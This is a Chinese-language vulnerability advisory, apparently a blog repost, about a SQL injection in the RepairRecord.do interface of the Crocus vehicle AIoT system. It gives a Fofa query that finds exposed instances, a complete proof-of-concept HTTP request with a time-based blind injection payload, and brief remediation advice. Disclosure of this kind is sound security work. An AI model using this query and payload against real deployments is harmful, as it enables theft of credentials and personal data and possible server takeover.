锐明Crocus系统 RepairRecord.do SQL注入漏洞

0x01 产品描述:

明锐技术是一家专注于AI和视频技术的商用车智能物联(AIoT)解决方案提供商,Crocus系统是其核心产品之一。该系统旨在利用人工智能、高清视频、大数据和自动驾驶技术,提高企业或车队的运营效率,帮助商用车减少交通事故和货物丢失。通过车载摄像头、毫米波雷达等传感器,Crocus系统能够实现对车辆周围环境的实时感知和监控,显著提升驾驶安全性。此外,利用AI技术,系统能够分析驾驶员的驾驶行为,并及时识别车辆和行人的身份,从而提醒驾驶员注意潜在风险。同时,Crocus系统还具备实时监控货箱状态的能力,包括跟踪货物是否丢失、检查货箱是否关闭等,通过3D检测技术实现更精准的货物识别和管理。

0x02 漏洞描述:

明锐技术的Crocus系统中,RepairRecord.do接口存在SQL注入漏洞,这一漏洞使得经过身份验证的远程攻击者能够利用该接口进行恶意操作。攻击者可以通过SQL注入获取数据库中的敏感信息,例如管理员后台密码和用户个人信息。此外,在某些情况下,攻击者可能获得高权限,甚至能够向服务器写入shell脚本,从而进一步获取服务器的系统权限,导致更严重的安全风险

0x03 搜索语句:

Fofa:body="/ThirdResource/respond/respond.min.js" && title="Crocus"

0x04 漏洞复现:

复制代码
POST /RepairRecord.do?Action=QueryLast HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Token: c3RyZWFtYXgyMDAyMDgxODoxNzI0NjM2OTQyMTA0Ljg4NDU=
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: Saffron.U=VUlEPTEmVU49c3RyZWFtYXgyMDAyMDgxOCZHSUQ9MTcyNDYzNjk0MjEwNC44ODQ1MTQmUklEPTEmTT1CTWFwJklOUz0x
Connection: close

EndTime=2024-08-20+00%3A00%3A00&PageIndex=0&PageSize=20&RepairState=-1&StartTime=2024-08-26+00%3A00%3A00&orderField=(select*from(select%0asleep(5))a)&orderType=asc

0x05 修复建议:

关闭互联网暴露面或接口设置访问权限。

建议对所有输入数据进行严格验证,并使用参数化查询。同时,应限制数据库用户的权限,仅授予执行必要操作所需的最低权限。定期进行安全审计,以发现并修复潜在的安全漏洞。

相关推荐
木易 士心39 分钟前
深入理解 MySQL 权限撤销(REVOKE)机制:从语法到安全实践
数据库·后端·mysql·安全
码农小白AI1 小时前
AI审核加持的IACheck:塔吊与施工电梯安全监测系统检测报告如何实现高效合规与风险可控
大数据·人工智能·安全
workflower3 小时前
智能体安全呈现三大核心趋势
人工智能·安全·机器人·智能家居·ai编程
今夕资源网3 小时前
windows11一键禁用安全中心脚本 一键恢复安全中心脚本Windows Defender
windows·安全·windows11·安全中心·杀毒软件·自带杀软·一键禁用
~央千澈~3 小时前
解防跨站功能生成的.user.ini文件溯源跨站脚本攻击(XSS)-优雅草卓伊凡
安全·防跨站
瘾大侠3 小时前
HTB - Kobold
网络·安全·web安全·网络安全
无忧智库4 小时前
破局与重构:高校数字化安全管理平台的全景式深度解构(PPT)
安全
crazyme_64 小时前
从软件工程视角拆解 OWASP ZAP:开源安全工具的架构设计与结对分析实践
安全·开源·软件工程
李白你好4 小时前
一个综合性的Web安全学习平台
学习·安全·web安全
中科固源4 小时前
强制性国标在路上:预解读《民用无人驾驶航空器数据链路网络安全要求》(二)
安全·网络安全·低空经济·商业航天